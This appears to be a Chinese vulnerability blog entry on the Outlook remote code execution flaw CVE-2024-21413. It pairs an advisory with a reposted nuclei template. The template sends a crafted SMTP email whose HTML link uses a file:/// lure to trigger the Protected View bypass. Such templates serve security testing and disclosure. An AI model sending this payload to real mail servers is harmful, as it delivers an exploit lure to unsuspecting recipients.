Microsoft Outlook Remote Code Execution Vulnerability

漏洞信息

漏洞名称: Microsoft Outlook Remote Code Execution Vulnerability

漏洞编号:

  • CVE: CVE-2024-21413

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: Microsoft Outlook是微软公司开发的一款广泛使用的电子邮件客户端,作为Microsoft 365套件的一部分,它被广泛应用于企业和个人用户中,用于管理电子邮件、日历、联系人等。由于其广泛的使用基础,任何安全漏洞都可能对大量用户造成严重影响。该漏洞(CVE-2024-21413)是一种远程代码执行漏洞,攻击者可以通过构造恶意的电子邮件内容,利用Outlook处理特定HTML内容时的缺陷,绕过Office的Protected View保护机制,诱使用户在编辑模式下而非保护模式下打开文件,从而执行任意代码。这种漏洞的利用不需要用户交互,攻击者可以远程触发,且成功利用后可以获得与当前用户相同的权限,可能导致数据泄露、系统控制等严重后果。由于该漏洞的CVSS评分为9.8,属于严重级别,因此建议用户尽快应用微软发布的安全更新以防止潜在的攻击。

产品厂商: Microsoft

产品名称: 365_apps

来源: https://github.com/projectdiscovery/nuclei-templates/blob/adb7d9a749d4ad2754d90d091a1ebcf05db692e4/network%2Fcves%2F2024%2FCVE-2024-21413.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74

id: CVE-2024-21413

info:
name: Microsoft Outlook Remote Code Execution Vulnerability - CVE-2024-21413
author: redperfect1847
severity: critical
description: |
Microsoft Outlook Remote Code Execution Vulnerability. Successful exploitation of this vulnerability would allow an attacker to bypass the Office Protected View and open in editing mode rather than protected mode.
reference:
- https://github.com/duy-31/CVE-2024-21413
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-21413
cwe-id: CWE-20,NVD-CWE-noinfo
epss-score: 0.93681
epss-percentile: 0.99836
cpe: cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*
metadata:
vendor: microsoft
product: 365_apps
tags: cve, cve2024, microsoft,kev
tcp:
- inputs:
- data: "HELO {{Hostname}}\r\n"

- data: "MAIL FROM:<{{from}}>\r\n"

- data: "RCPT TO:<{{rcpt}}>\r\n"

- data: "DATA\r\n"

- data: |
From: <{{from}}>
To: <{{rcpt}}>
Subject: Rdv important (evil inside)
Mime-Version: 1.0
Content-Type: multipart/alternative; boundary=test

--test
Content-Type: text/plain; charset=us-ascii

This should be read in HTML
--test
Content-Type: text/html; charset=ISO-8859-1

<html>
<body>
<h1><a href="file:///{{url}}">Meeting - click here.</a></h1>
</body>
</html>
--test--\r\n.

- data: "QUIT\r\n"

host:
- "{{Hostname}}"
port: 25

matchers-condition: and
matchers:
- type: word
words:
- "220"
- "250"
part: all

- type: regex
regex:
- "Meeting - click here."
part: all



Microsoft Outlook Remote Code Execution Vulnerability
http://example.com/2025/07/08/github_78228618/
作者
lianccc
发布于
2025年7月8日
许可协议